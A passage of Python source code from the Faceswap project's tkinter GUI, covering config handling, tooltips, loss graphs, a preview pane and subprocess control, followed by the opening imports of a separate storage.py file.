file=os.path.join(pathicons, 'reset.png'))
self.icons['clear'] = tk.PhotoImage(
file=os.path.join(pathicons, 'clear.png'))
self.guitext['help'] = tk.StringVar()
self.guitext['status'] = tk.StringVar()
def action_command(self, command):
""" The action to perform when the action button is pressed """
if self.runningtask:
self.action_terminate()
else:
self.action_execute(command)
def action_execute(self, command):
""" Execute the task in Faceswap.py """
self.clear_console()
self.task.prepare(self.opts, command)
self.task.execute_script()
def action_terminate(self):
""" Terminate the subprocess Faceswap.py task """
self.task.terminate()
self.runningtask = False
self.clear_display_panel()
self.change_action_button()
def clear_display_panel(self):
""" Clear the preview window and graph """
self.delete_preview()
self.lossdict = dict()
def change_action_button(self):
""" Change the action button to relevant control """
for cmd in self.actionbtns.keys():
btnact = self.actionbtns[cmd]
if self.runningtask:
ttl = 'Terminate'
hlp = 'Exit the running process'
else:
ttl = cmd.title()
hlp = 'Run the {} script'.format(cmd.title())
btnact.config(text=ttl)
Tooltip(btnact, text=hlp, wraplength=200)
def clear_console(self):
""" Clear the console output screen """
self.console.delete(1.0, tk.END)
def load_config(self, command=None):
""" Load a saved config file """
cfgfile = filedialog.askopenfile(mode='r', filetypes=self.filetypes)
if not cfgfile:
return
cfg = self.serializer.unmarshal(cfgfile.read())
if command is None:
for cmd, opts in cfg.items():
self.set_command_args(cmd, opts)
else:
opts = cfg.get(command, None)
if opts:
self.set_command_args(command, opts)
else:
self.clear_console()
print('No ' + command + ' section found in file')
def set_command_args(self, command, options):
""" Pass the saved config items back to the GUI """
for srcopt, srcval in options.items():
for dstopts in self.opts[command]:
if dstopts['control_title'] == srcopt:
dstopts['value'].set(srcval)
break
def save_config(self, command=None):
""" Save the current GUI state to a config file in json format """
cfgfile = filedialog.asksaveasfile(mode='w',
filetypes=self.filetypes,
defaultextension='.fsw')
if not cfgfile:
return
if command is None:
cfg = {cmd: {opt['control_title']: opt['value'].get() for opt in opts}
for cmd, opts in self.opts.items()}
else:
cfg = {command: {opt['control_title']: opt['value'].get()
for opt in self.opts[command]}}
cfgfile.write(self.serializer.marshal(cfg))
cfgfile.close()
def reset_config(self, command=None):
""" Reset the GUI to the default values """
if command is None:
options = [opt for opts in self.opts.values() for opt in opts]
else:
options = [opt for opt in self.opts[command]]
for option in options:
default = option.get('default', '')
default = '' if default is None else default
option['value'].set(default)
def clear_config(self, command=None):
""" Clear all values from the GUI """
if command is None:
options = [opt for opts in self.opts.values() for opt in opts]
else:
options = [opt for opt in self.opts[command]]
for option in options:
if isinstance(option['value'].get(), bool):
option['value'].set(False)
elif isinstance(option['value'].get(), int):
option['value'].set(0)
else:
option['value'].set('')
def delete_preview(self):
""" Delete the preview file """
if os.path.exists(self.previewloc):
os.remove(self.previewloc)
def get_chosen_action(self, task_name):
return self.opts[task_name][0]['value'].get()
class Tooltip:
"""
Create a tooltip for a given widget as the mouse goes on it.
Adapted from StackOverflow:
http://stackoverflow.com/questions/3221956/
what-is-the-simplest-way-to-make-tooltips-
in-tkinter/36221216#36221216
http://www.daniweb.com/programming/software-development/
code/484591/a-tooltip-class-for-tkinter
- Originally written by vegaseat on 2014.09.09.
- Modified to include a delay time by Victor Zaccardo on 2016.03.25.
- Modified
- to correct extreme right and extreme bottom behavior,
- to stay inside the screen whenever the tooltip might go out on
the top but still the screen is higher than the tooltip,
- to use the more flexible mouse positioning,
- to add customizable background color, padding, waittime and
wraplength on creation
by Alberto Vassena on 2016.11.05.
Tested on Ubuntu 16.04/16.10, running Python 3.5.2
"""
def __init__(self, widget,
*,
background='#FFFFEA',
pad=(5, 3, 5, 3),
text='widget info',
waittime=400,
wraplength=250):
self.waittime = waittime # in miliseconds, originally 500
self.wraplength = wraplength # in pixels, originally 180
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.on_enter)
self.widget.bind("<Leave>", self.on_leave)
self.widget.bind("<ButtonPress>", self.on_leave)
self.background = background
self.pad = pad
self.ident = None
self.topwidget = None
def on_enter(self, event=None):
""" Schedule on an enter event """
self.schedule()
def on_leave(self, event=None):
""" Unschedule on a leave event """
self.unschedule()
self.hide()
def schedule(self):
""" Show the tooltip after wait period """
self.unschedule()
self.ident = self.widget.after(self.waittime, self.show)
def unschedule(self):
""" Hide the tooltip """
id_ = self.ident
self.ident = None
if id_:
self.widget.after_cancel(id_)
def show(self):
""" Show the tooltip """
def tip_pos_calculator(widget, label,
*,
tip_delta=(10, 5), pad=(5, 3, 5, 3)):
""" Calculate the tooltip position """
s_width, s_height = widget.winfo_screenwidth(), widget.winfo_screenheight()
width, height = (pad[0] + label.winfo_reqwidth() + pad[2],
pad[1] + label.winfo_reqheight() + pad[3])
mouse_x, mouse_y = widget.winfo_pointerxy()
x_1, y_1 = mouse_x + tip_delta[0], mouse_y + tip_delta[1]
x_2, y_2 = x_1 + width, y_1 + height
x_delta = x_2 - s_width
if x_delta < 0:
x_delta = 0
y_delta = y_2 - s_height
if y_delta < 0:
y_delta = 0
offscreen = (x_delta, y_delta) != (0, 0)
if offscreen:
if x_delta:
x_1 = mouse_x - tip_delta[0] - width
if y_delta:
y_1 = mouse_y - tip_delta[1] - height
offscreen_again = y_1 < 0 # out on the top
if offscreen_again:
# No further checks will be done.
# TIP:
# A further mod might automagically augment the
# wraplength when the tooltip is too high to be
# kept inside the screen.
y_1 = 0
return x_1, y_1
background = self.background
pad = self.pad
widget = self.widget
# creates a toplevel window
self.topwidget = tk.Toplevel(widget)
# Leaves only the label and removes the app window
self.topwidget.wm_overrideredirect(True)
win = tk.Frame(self.topwidget,
background=background,
borderwidth=0)
label = tk.Label(win,
text=self.text,
justify=tk.LEFT,
background=background,
relief=tk.SOLID,
borderwidth=0,
wraplength=self.wraplength)
label.grid(padx=(pad[0], pad[2]),
pady=(pad[1], pad[3]),
sticky=tk.NSEW)
win.grid()
xpos, ypos = tip_pos_calculator(widget, label)
self.topwidget.wm_geometry("+%d+%d" % (xpos, ypos))
def hide(self):
""" Hide the tooltip """
topwidget = self.topwidget
if topwidget:
topwidget.destroy()
self.topwidget = None
class FaceswapGui(object):
""" The Graphical User Interface """
def __init__(self, utils, calling_file='faceswap.py'):
self.gui = tk.Tk()
self.utils = utils
self.calling_file = calling_file
self.utils.delete_preview()
self.utils.init_tk()
self.gui.protocol('WM_DELETE_WINDOW', self.close_app)
def build_gui(self):
""" Build the GUI """
self.gui.title(self.calling_file)
self.menu()
container = tk.PanedWindow(self.gui,
sashrelief=tk.RAISED,
orient=tk.VERTICAL)
container.pack(fill=tk.BOTH, expand=True)
topcontainer = tk.PanedWindow(container,
sashrelief=tk.RAISED,
orient=tk.HORIZONTAL)
container.add(topcontainer)
bottomcontainer = ttk.Frame(container, height=150)
container.add(bottomcontainer)
optsnotebook = ttk.Notebook(topcontainer, width=400, height=500)
topcontainer.add(optsnotebook)
if self.calling_file == 'faceswap.py':
# Commands explicitly stated to ensure consistent ordering
cmdlist = ('extract', 'train', 'convert')
else:
cmdlist = self.utils.opts.keys()
for command in cmdlist:
commandtab = CommandTab(self.utils, optsnotebook, command)
commandtab.build_tab()
dspnotebook = ttk.Notebook(topcontainer, width=780)
topcontainer.add(dspnotebook)
for display in ('graph', 'preview'):
displaytab = DisplayTab(self.utils, dspnotebook, display)
displaytab.build_tab()
self.add_console(bottomcontainer)
self.add_status_bar(bottomcontainer)
def menu(self):
""" Menu bar for loading and saving configs """
menubar = tk.Menu(self.gui)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label='Load full config...',
command=self.utils.load_config)
filemenu.add_command(label='Save full config...',
command=self.utils.save_config)
filemenu.add_separator()
filemenu.add_command(label='Reset all to default',
command=self.utils.reset_config)
filemenu.add_command(label='Clear all',
command=self.utils.clear_config)
filemenu.add_separator()
filemenu.add_command(label='Quit', command=self.close_app)
menubar.add_cascade(label="File", menu=filemenu)
self.gui.config(menu=menubar)
def add_console(self, frame):
""" Build the output console """
consoleframe = ttk.Frame(frame)
consoleframe.pack(side=tk.TOP, anchor=tk.W, padx=10, pady=(2, 0),
fill=tk.BOTH, expand=True)
console = ConsoleOut(consoleframe, self.utils)
console.build_console()
def add_status_bar(self, frame):
""" Build the info text section page """
statusframe = ttk.Frame(frame)
statusframe.pack(side=tk.BOTTOM, anchor=tk.W, padx=10, pady=2,
fill=tk.X, expand=False)
lbltitle = ttk.Label(statusframe, text='Status:', width=6, anchor=tk.W)
lbltitle.pack(side=tk.LEFT, expand=False)
self.utils.guitext['status'].set('Ready')
lblstatus = ttk.Label(statusframe,
width=20,
textvariable=self.utils.guitext['status'],
anchor=tk.W)
lblstatus.pack(side=tk.LEFT, anchor=tk.W, fill=tk.X, expand=True)
def close_app(self):
""" Close Python. This is here because the graph animation function
continues to
run even when tkinter has gone away """
confirm = messagebox.askokcancel
confirmtxt = 'Processes are still running. Are you sure...?'
if self.utils.runningtask and not confirm('Close', confirmtxt):
return
if self.utils.runningtask:
self.utils.task.terminate()
self.utils.delete_preview()
self.gui.quit()
exit()
class ConsoleOut(object):
""" The Console out tab of the Display section """
def __init__(self, frame, utils):
self.frame = frame
utils.console = tk.Text(self.frame)
self.console = utils.console
self.debug = utils.debugconsole
def build_console(self):
""" Build and place the console """
self.console.config(width=100, height=6, bg='gray90', fg='black')
self.console.pack(side=tk.LEFT, anchor=tk.N, fill=tk.BOTH, expand=True)
scrollbar = ttk.Scrollbar(self.frame, command=self.console.yview)
scrollbar.pack(side=tk.LEFT, fill='y')
self.console.configure(yscrollcommand=scrollbar.set)
if self.debug:
print('Console debug activated. Outputting to main terminal')
else:
sys.stdout = SysOutRouter(console=self.console, out_type="stdout")
sys.stderr = SysOutRouter(console=self.console, out_type="stderr")
class SysOutRouter(object):
""" Route stdout/stderr to the console window """
def __init__(self, console=None, out_type=None):
self.console = console
self.out_type = out_type
self.color = ("black" if out_type == "stdout" else "red")
def write(self, string):
""" Capture stdout/stderr """
self.console.insert(tk.END, string, self.out_type)
self.console.tag_config(self.out_type, foreground=self.color)
self.console.see(tk.END)
@staticmethod
def flush():
""" If flush is forced, send it to normal terminal """
sys.__stdout__.flush()
class CommandTab(object):
""" Tabs to hold the command options """
def __init__(self, utils, notebook, command):
self.utils = utils
self.notebook = notebook
self.page = ttk.Frame(self.notebook)
self.command = command
self.title = command.title()
def build_tab(self):
""" Build the tab """
actionframe = ActionFrame(self.utils, self.page, self.command)
actionframe.build_frame()
self.add_frame_separator()
opts_frame = OptionsFrame(self.utils, self.page, self.command)
opts_frame.build_frame()
self.notebook.add(self.page, text=self.title)
def add_frame_separator(self):
""" Add a separator between left and right frames """
sep = ttk.Frame(self.page, height=2, relief=tk.RIDGE)
sep.pack(fill=tk.X, pady=(5, 0), side=tk.BOTTOM)
class OptionsFrame(object):
""" Options Frame - Holds the Options for each command """
def __init__(self, utils, page, command):
self.utils = utils
self.page = page
self.command = command
self.canvas = tk.Canvas(self.page, bd=0, highlightthickness=0)
self.canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
self.optsframe = tk.Frame(self.canvas)
self.optscanvas = self.canvas.create_window((0, 0), window=self.optsframe, anchor=tk.NW)
def build_frame(self):
""" Build the options frame for this command """
self.add_scrollbar()
self.canvas.bind('<Configure>', self.resize_frame)
for option in self.utils.opts[self.command]:
optioncontrol = OptionControl(self.utils, option, self.optsframe)
optioncontrol.build_full_control()
def add_scrollbar(self):
""" Add a scrollbar to the options frame """
scrollbar = ttk.Scrollbar(self.page, command=self.canvas.yview)
scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
self.canvas.config(yscrollcommand=scrollbar.set)
self.optsframe.bind("<Configure>", self.update_scrollbar)
def update_scrollbar(self, event):
""" Update the options frame scrollbar """
self.canvas.configure(scrollregion=self.canvas.bbox('all'))
def resize_frame(self, event):
""" Resize the options frame to fit the canvas """
canvas_width = event.width
self.canvas.itemconfig(self.optscanvas, width=canvas_width)
class OptionControl(object):
""" Build the correct control for the option parsed and place it on the
frame """
def __init__(self, utils, option, option_frame):
self.utils = utils
self.option = option
self.option_frame = option_frame
def build_full_control(self):
""" Build the correct control type for the option passed through """
ctl = self.option['control']
ctltitle = self.option['control_title']
sysbrowser = self.option['filesystem_browser']
ctlhelp = ' '.join(self.option.get('help', '').split())
ctlhelp = '. '.join(i.capitalize() for i in ctlhelp.split('. '))
ctlhelp = ctltitle + ' - ' + ctlhelp
ctlframe = self.build_one_control_frame()
dflt = self.option.get('default', '')
dflt = self.option.get('default', False) if ctl == ttk.Checkbutton else dflt
choices = self.option['choices'] if ctl == ttk.Combobox else None
self.build_one_control_label(ctlframe, ctltitle)
self.option['value'] = self.build_one_control(ctlframe,
ctl,
dflt,
ctlhelp,
choices,
sysbrowser)
def build_one_control_frame(self):
""" Build the frame to hold the control """
frame = ttk.Frame(self.option_frame)
frame.pack(fill=tk.X, expand=True)
return frame
@staticmethod
def build_one_control_label(frame, control_title):
""" Build and place the control label """
lbl = ttk.Label(frame, text=control_title, width=18, anchor=tk.W)
lbl.pack(padx=5, pady=5, side=tk.LEFT, anchor=tk.N)
def build_one_control(self, frame, control, default, helptext, choices,
sysbrowser):
""" Build and place the option controls """
default = default if default is not None else ''
var = tk.BooleanVar(
frame) if control == ttk.Checkbutton else tk.StringVar(frame)
var.set(default)
if sysbrowser is not None:
# if sysbrowser in "load file":
self.add_browser_buttons(frame, sysbrowser, var)
# elif sysbrowser == "combo":
# self.add_browser_combo_button(frame, sysbrowser, var)
ctlkwargs = {'variable': var} if control == ttk.Checkbutton else {
'textvariable': var}
packkwargs = {'anchor': tk.W} if control == ttk.Checkbutton else {
'fill': tk.X, 'expand': True}
ctl = control(frame, **ctlkwargs)
if control == ttk.Combobox:
ctl['values'] = [choice for choice in choices]
ctl.pack(padx=5, pady=5, **packkwargs)
Tooltip(ctl, text=helptext, wraplength=200)
return var
def add_browser_buttons(self, frame, sysbrowser, filepath):
""" Add correct file browser button for control """
if sysbrowser == "combo":
img = self.utils.icons['load']
else:
img = self.utils.icons[sysbrowser]
action = getattr(self, 'ask_' + sysbrowser)
filetypes = self.option['filetypes']
fileopn = ttk.Button(frame, image=img,
command=lambda cmd=action: cmd(filepath,
filetypes))
fileopn.pack(padx=(0, 5), side=tk.RIGHT)
@staticmethod
def ask_folder(filepath, filetypes=None):
"""
Pop-up to get path to a directory
:param filepath: tkinter StringVar object that will store the path to a
directory.
:param filetypes: Unused argument to allow filetypes to be given in
ask_load().
"""
dirname = filedialog.askdirectory()
if dirname:
filepath.set(dirname)
@staticmethod
def ask_load(filepath, filetypes=None):
""" Pop-up to get path to a file """
if filetypes is None:
filename = filedialog.askopenfilename()
else:
# In case filetypes were not configured properly in the
# arguments_list
try:
filename = filedialog.askopenfilename(filetypes=filetypes)
except TclError as te1:
filetypes = FileFullPaths.prep_filetypes(filetypes)
filename = filedialog.askopenfilename(filetypes=filetypes)
except TclError as te2:
filename = filedialog.askopenfilename()
if filename:
filepath.set(filename)
@staticmethod
def ask_save(filepath, filetypes=None):
""" Pop-up to get path to save a new file """
if filetypes is None:
filename = filedialog.asksaveasfilename()
else:
# In case filetypes were not configured properly in the
# arguments_list
try:
filename = filedialog.asksaveasfilename(filetypes=filetypes)
except TclError as te1:
filetypes = FileFullPaths.prep_filetypes(filetypes)
filename = filedialog.asksaveasfilename(filetypes=filetypes)
except TclError as te2:
filename = filedialog.asksaveasfilename()
if filename:
filepath.set(filename)
@staticmethod
def ask_nothing(filepath, filetypes=None):
""" Method that does nothing, used for disabling open/save pop up """
return
def ask_combo(self, filepath, filetypes):
actions_open_type = self.option['actions_open_type']
task_name = actions_open_type['task_name']
chosen_action = self.utils.get_chosen_action(task_name)
action = getattr(self, "ask_" + actions_open_type[chosen_action])
filetypes = filetypes[chosen_action]
action(filepath, filetypes)
class ActionFrame(object):
"""Action Frame - Displays information and action controls """
def __init__(self, utils, page, command):
self.utils = utils
self.page = page
self.command = command
self.title = command.title()
def build_frame(self):
""" Add help display and Action buttons to the left frame of each
page """
frame = ttk.Frame(self.page)
frame.pack(fill=tk.BOTH, padx=(10, 5), side=tk.BOTTOM, anchor=tk.N)
self.add_action_button(frame)
self.add_util_buttons(frame)
def add_action_button(self, frame):
""" Add the action buttons for page """
actframe = ttk.Frame(frame)
actframe.pack(fill=tk.X, side=tk.LEFT, padx=5, pady=5)
btnact = ttk.Button(actframe,
text=self.title,
width=12,
command=lambda: self.utils.action_command(
self.command))
btnact.pack(side=tk.TOP)
Tooltip(btnact, text='Run the {} script'.format(self.title), wraplength=200)
self.utils.actionbtns[self.command] = btnact
def add_util_buttons(self, frame):
""" Add the section utility buttons """
utlframe = ttk.Frame(frame)
utlframe.pack(side=tk.RIGHT, padx=(5, 10), pady=5)
for utl in ('load', 'save', 'clear', 'reset'):
img = self.utils.icons[utl]
action = getattr(self.utils, utl + '_config')
btnutl = ttk.Button(utlframe,
image=img,
command=lambda cmd=action: cmd(self.command))
btnutl.pack(padx=2, side=tk.LEFT)
Tooltip(btnutl, text=utl.capitalize() + ' ' + self.title + ' config', wraplength=200)
class DisplayTab(object):
""" The display tabs """
def __init__(self, utils, notebook, display):
self.utils = utils
self.notebook = notebook
self.page = ttk.Frame(self.notebook)
self.display = display
self.title = self.display.title()
def build_tab(self):
""" Build the tab """
frame = ttk.Frame(self.page)
frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True, padx=5, pady=5)
if self.display == 'graph':
graphframe = GraphDisplay(frame, self.utils)
graphframe.create_graphs()
elif self.display == 'preview':
preview = PreviewDisplay(frame, self.utils.previewloc)
preview.update_preview()
else: # Dummy in a placeholder
lbl = ttk.Label(frame, text=self.display, width=15, anchor=tk.NW)
lbl.pack(padx=5, pady=5, side=tk.LEFT, anchor=tk.N)
self.notebook.add(self.page, text=self.title)
class GraphDisplay(object):
""" The Graph Tab of the Display section """
def __init__(self, frame, utils):
self.frame = frame
self.utils = utils
self.losskeys = None
self.graphpane = tk.PanedWindow(self.frame, sashrelief=tk.RAISED, orient=tk.VERTICAL)
self.graphpane.pack(fill=tk.BOTH, expand=True)
self.graphs = list()
def create_graphs(self):
""" create the graph frames when there are loss values to graph """
if not self.utils.lossdict:
self.frame.after(1000, self.create_graphs)
return
self.losskeys = sorted([key for key in self.utils.lossdict.keys()])
framecount = int(len(self.utils.lossdict) / 2)
for i in range(framecount):
self.add_graph(i)
self.monitor_state()
def add_graph(self, index):
""" Add a single graph to the graph window """
graphframe = ttk.Frame(self.graphpane)
self.graphpane.add(graphframe)
selectedkeys = self.losskeys[index * 2:(index + 1) * 2]
selectedloss = {key: self.utils.lossdict[key] for key in selectedkeys}
graph = Graph(graphframe, selectedloss, selectedkeys)
self.graphs.append(graph)
graph.build_graph()
def monitor_state(self):
""" Check there is a task still running. If not, destroy graphs
and reset graph display to waiting state """
if self.utils.lossdict:
self.frame.after(5000, self.monitor_state)
return
self.destroy_graphs()
self.create_graphs()
def destroy_graphs(self):
""" Destroy graphs when the process has stopped """
for graph in self.graphs:
del graph
self.graphs = list()
for child in self.graphpane.panes():
self.graphpane.remove(child)
class Graph(object):
""" Each graph to be displayed. Until training is run it is not known
how many graphs will be required, so they sit in their own class
ready to be created when requested """
def __init__(self, frame, loss, losskeys):
self.frame = frame
self.loss = loss
self.losskeys = losskeys
self.ylim = (100, 0)
style.use('ggplot')
self.fig = plt.figure(figsize=(4, 4), dpi=75)
self.ax1 = self.fig.add_subplot(1, 1, 1)
self.losslines = list()
self.trndlines = list()
def build_graph(self):
""" Update the plot area with loss values and cycle through to
animate """
self.ax1.set_xlabel('Iterations')
self.ax1.set_ylabel('Loss')
self.ax1.set_ylim(0.00, 0.01)
self.ax1.set_xlim(0, 1)
losslbls = [lbl.replace('_', ' ').title() for lbl in self.losskeys]
for idx, linecol in enumerate(['blue', 'red']):
self.losslines.extend(self.ax1.plot(0, 0,
color=linecol,
linewidth=1,
label=losslbls[idx]))
for idx, linecol in enumerate(['navy', 'firebrick']):
lbl = losslbls[idx]
lbl = 'Trend{}'.format(lbl[lbl.rfind(' '):])
self.trndlines.extend(self.ax1.plot(0, 0,
color=linecol,
linewidth=2,
label=lbl))
self.ax1.legend(loc='upper right')
plt.subplots_adjust(left=0.075, bottom=0.075, right=0.95, top=0.95,
wspace=0.2, hspace=0.2)
plotcanvas = FigureCanvasTkAgg(self.fig, self.frame)
plotcanvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=True)
ani = animation.FuncAnimation(self.fig, self.animate, interval=2000, blit=False)
plotcanvas.draw()
def animate(self, i):
""" Read loss data and apply to graph """
loss = [self.loss[key][:] for key in self.losskeys]
xlim = self.recalculate_axes(loss)
xrng = [x for x in range(xlim)]
self.raw_plot(xrng, loss)
if xlim > 10:
self.trend_plot(xrng, loss)
def recalculate_axes(self, loss):
""" Recalculate the latest x and y axes limits from latest data """
ymin = floor(min([min(lossvals) for lossvals in loss]) * 100) / 100
ymax = ceil(max([max(lossvals) for lossvals in loss]) * 100) / 100
if ymin < self.ylim[0] or ymax > self.ylim[1]:
self.ylim = (ymin, ymax)
self.ax1.set_ylim(self.ylim[0], self.ylim[1])
xlim = len(loss[0])
xlim = 2 if xlim == 1 else xlim
self.ax1.set_xlim(0, xlim - 1)
return xlim
def raw_plot(self, x_range, loss):
""" Raw value plotting """
for idx, lossvals in enumerate(loss):
self.losslines[idx].set_data(x_range, lossvals)
def trend_plot(self, x_range, loss):
""" Trend value plotting """
for idx, lossvals in enumerate(loss):
fit = numpy.polyfit(x_range, lossvals, 3)
poly = numpy.poly1d(fit)
self.trndlines[idx].set_data(x_range, poly(x_range))
class PreviewDisplay(object):
""" The Preview tab of the Display section """
def __init__(self, frame, previewloc):
self.frame = frame
self.previewimg = None
self.errcount = 0
self.previewloc = previewloc
self.previewlbl = ttk.Label(self.frame, image=None, anchor=tk.NW)
self.previewlbl.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
def update_preview(self):
""" Display the image if it exists or a place holder if it doesn't """
self.load_preview()
if self.previewimg is None:
self.previewlbl.config(image=None)
else:
self.previewlbl.config(image=self.previewimg)
self.previewlbl.after(1000, self.update_preview)
def load_preview(self):
""" Load the preview image into tk PhotoImage """
if os.path.exists(self.previewloc):
try:
self.previewimg = tk.PhotoImage(file=self.previewloc)
self.errcount = 0
except TclError:
# This is probably an error reading the file whilst it's
# being saved
# so ignore it for now and only pick up if there have been
# multiple
# consecutive fails
if self.errcount < 10:
self.errcount += 1
self.previewimg = None
else:
print('Error reading the preview file')
else:
self.previewimg = None
class FaceswapControl(object):
""" Control the underlying Faceswap tasks """
__group_processes = ["effmpeg"]
def __init__(self, utils, calling_file="faceswap.py"):
self.pathexecscript = os.path.join(PATHSCRIPT, calling_file)
self.utils = utils
self.command = None
self.args = None
self.process = None
self.lenloss = 0
def prepare(self, options, command):
""" Prepare for running the subprocess """
self.command = command
self.utils.runningtask = True
self.utils.change_action_button()
self.utils.guitext['status'].set('Executing - ' + self.command + '.py')
print('Loading...')
self.args = ['python', '-u', self.pathexecscript, self.command]
self.build_args(options)
def build_args(self, options):
""" Build the faceswap command and arguments list """
for item in options[self.command]:
optval = str(item.get('value', '').get())
opt = item['opts'][0]
if optval == 'False' or optval == '':
continue
elif optval == 'True':
if self.command == 'train' and opt == '-p': # Embed the preview pane
self.args.append('-gui')
else:
self.args.append(opt)
else:
self.args.extend((opt, optval))
def execute_script(self):
""" Execute the requested Faceswap Script """
kwargs = {'stdout': PIPE,
'stderr': PIPE,
'bufsize': 1,
'universal_newlines': True}
if self.command in self.__group_processes:
kwargs['preexec_fn'] = os.setsid
if os.name == 'nt':
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
self.process = Popen(self.args, **kwargs)
self.thread_stdout()
self.thread_stderr()
def read_stdout(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stdout.readline()
if output == '' and self.process.poll() is not None:
break
if output:
if self.command == 'train' and str.startswith(output, '['):
self.capture_loss(output)
print(output.strip())
returncode = self.process.poll()
self.utils.runningtask = False
self.utils.change_action_button()
self.set_final_status(returncode)
print('Process exited.')
def read_stderr(self):
""" Read stdout from the subprocess. If training, pass the loss
values to Queue """
while True:
output = self.process.stderr.readline()
if output == '' and self.process.poll() is not None:
break
print(output.strip(), file=sys.stderr)
def thread_stdout(self):
""" Put the subprocess stdout so that it can be read without
blocking """
thread = Thread(target=self.read_stdout)
thread.daemon = True
thread.start()
def thread_stderr(self):
""" Put the subprocess stderr so that it can be read without
blocking """
thread = Thread(target=self.read_stderr)
thread.daemon = True
thread.start()
def capture_loss(self, string):
""" Capture loss values from stdout """
# TODO: Remove this hideous hacky fix. When the subprocess is terminated and
# the loss dictionary is reset, 1 set of loss values ALWAYS slips through
# and appends to the lossdict AFTER the subprocess has closed meaning that
# checks on whether the dictionary is empty fail.
# Therefore if the size of current loss dictionary is smaller than the
# previous loss dictionary, assume that the process has been terminated
# and reset it.
# I have tried and failed to empty the subprocess stdout with:
# sys.exit() on the stdout/err threads (no effect)
# sys.stdout/stderr.flush (no effect)
# thread.join (locks the whole process up, because the stdout thread
# stubbornly refuses to release its last line)
currentlenloss = len(self.utils.lossdict)
if self.lenloss > currentlenloss:
self.utils.lossdict = dict()
self.lenloss = 0
return
self.lenloss = currentlenloss
loss = re.findall(r'([a-zA-Z_]+):.*?(\d+\.\d+)', string)
if len(loss) < 2:
return
if not self.utils.lossdict:
self.utils.lossdict.update((item[0], []) for item in loss)
for item in loss:
self.utils.lossdict[item[0]].append(float(item[1]))
def terminate(self):
""" Terminate the subprocess """
if self.command == 'train':
print('Sending Exit Signal', flush=True)
try:
now = time()
if os.name == 'nt':
os.kill(self.process.pid, signal.CTRL_BREAK_EVENT)
else:
self.process.send_signal(signal.SIGINT)
while True:
timeelapsed = time() - now
if self.process.poll() is not None:
break
if timeelapsed > 30:
raise ValueError('Timeout reached sending Exit Signal')
return
except ValueError as err:
print(err)
elif self.command in self.__group_processes:
print('Terminating Process Group...')
pgid = os.getpgid(self.process.pid)
try:
os.killpg(pgid, signal.SIGINT)
self.process.wait(timeout=10)
print('Terminated')
except TimeoutExpired:
print('Termination timed out. Killing Process Group...')
os.killpg(pgid, signal.SIGKILL)
print('Killed')
else:
print('Terminating Process...')
try:
self.process.terminate()
self.process.wait(timeout=10)
print('Terminated')
except TimeoutExpired:
print('Termination timed out. Killing Process...')
self.process.kill()
print('Killed')
def set_final_status(self, returncode):
""" Set the status bar output based on subprocess return code """
if returncode == 0 or returncode == 3221225786:
status = 'Ready'
elif returncode == -15:
status = 'Terminated - {}.py'.format(self.command)
elif returncode == -9:
status = 'Killed - {}.py'.format(self.command)
elif returncode == -6:
status = 'Aborted - {}.py'.format(self.command)
else:
status = 'Failed - {}.py. Return Code: {}'.format(self.command, returncode)
self.utils.guitext['status'].set(status)
class Gui(object):
""" The GUI process. """
def __init__(self, arguments, subparsers):
# Don't try to load the GUI if there is no display or there are
# problems importing tkinter
if not self.check_display() or not self.check_tkinter_available():
return
cmd = sys.argv
# If not running in gui mode return before starting to create a window
if 'gui' not in cmd:
return
self.args = arguments
self.opts = self.extract_options(subparsers)
self.utils = Utils(self.opts, calling_file=cmd[0])
self.root = FaceswapGui(self.utils, calling_file=cmd[0])
@staticmethod
def check_display():
""" Check whether there is a display to output the GUI. If running on
Windows then assume not running in headless mode """
if not os.environ.get('DISPLAY', None) and os.name != 'nt':
if os.name == 'posix':
print('macOS users need to install XQuartz. '
'See https://support.apple.com/en-gb/HT201341')
return False
return True
@staticmethod
def check_tkinter_available():
""" Check whether TkInter is installed on user's machine """
tkinter_vars = [tk, ttk, filedialog, messagebox, TclError]
if any(var is None for var in tkinter_vars):
print(
"It looks like TkInter isn't installed for your OS, so "
"the GUI has been "
"disabled. To enable the GUI please install the TkInter "
"application.\n"
"You can try:\n"
" Windows/macOS: Install ActiveTcl Community "
"Edition from "
"www.activestate.com\n"
" Ubuntu/Mint/Debian: sudo apt install python3-tk\n"
" Arch: sudo pacman -S tk\n"
" CentOS/Redhat: sudo yum install tkinter\n"
" Fedora: sudo dnf install python3-tkinter\n",
file=sys.stderr)
return False
return True
def extract_options(self, subparsers):
""" Extract the existing ArgParse Options """
opts = {cmd: subparsers[cmd].argument_list + subparsers[cmd].optional_arguments
for cmd in subparsers.keys()}
for command in opts.values():
for opt in command:
if opt.get('help', '') == SUPPRESS:
command.remove(opt)
ctl, sysbrowser, filetypes, actions_open_types = self.set_control(opt)
opt['control_title'] = self.set_control_title(
opt.get('opts', ''))
opt['control'] = ctl
opt['filesystem_browser'] = sysbrowser
opt['filetypes'] = filetypes
opt['actions_open_types'] = actions_open_types
return opts
@staticmethod
def set_control_title(opts):
""" Take the option switch and format it nicely """
ctltitle = opts[1] if len(opts) == 2 else opts[0]
ctltitle = ctltitle.replace('-', ' ').replace('_', ' ').strip().title()
return ctltitle
@staticmethod
def set_control(option):
""" Set the control and filesystem browser to use for each option """
sysbrowser = None
filetypes = None
actions_open_type = None
ctl = ttk.Entry
if option.get('action', '') == FullPaths:
sysbrowser = 'folder'
elif option.get('action', '') == DirFullPaths:
sysbrowser = 'folder'
elif option.get('action', '') == FileFullPaths:
sysbrowser = 'load'
filetypes = option.get('filetypes', None)
elif option.get('action', '') == ComboFullPaths:
sysbrowser = 'combo'
actions_open_type = option['actions_open_type']
filetypes = option.get('filetypes', None)
elif option.get('choices', '') != '':
ctl = ttk.Combobox
elif option.get('action', '') == 'store_true':
ctl = ttk.Checkbutton
return ctl, sysbrowser, filetypes, actions_open_type
def process(self):
""" Builds the GUI """
self.utils.debugconsole = self.args.debug
self.root.build_gui()
self.root.gui.mainloop()
|
storage.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
set
except NameError:
from sets import Set as set
from torngas.utils import safeunicode
from threading import local as threadlocal
import warnings
import sys, copy
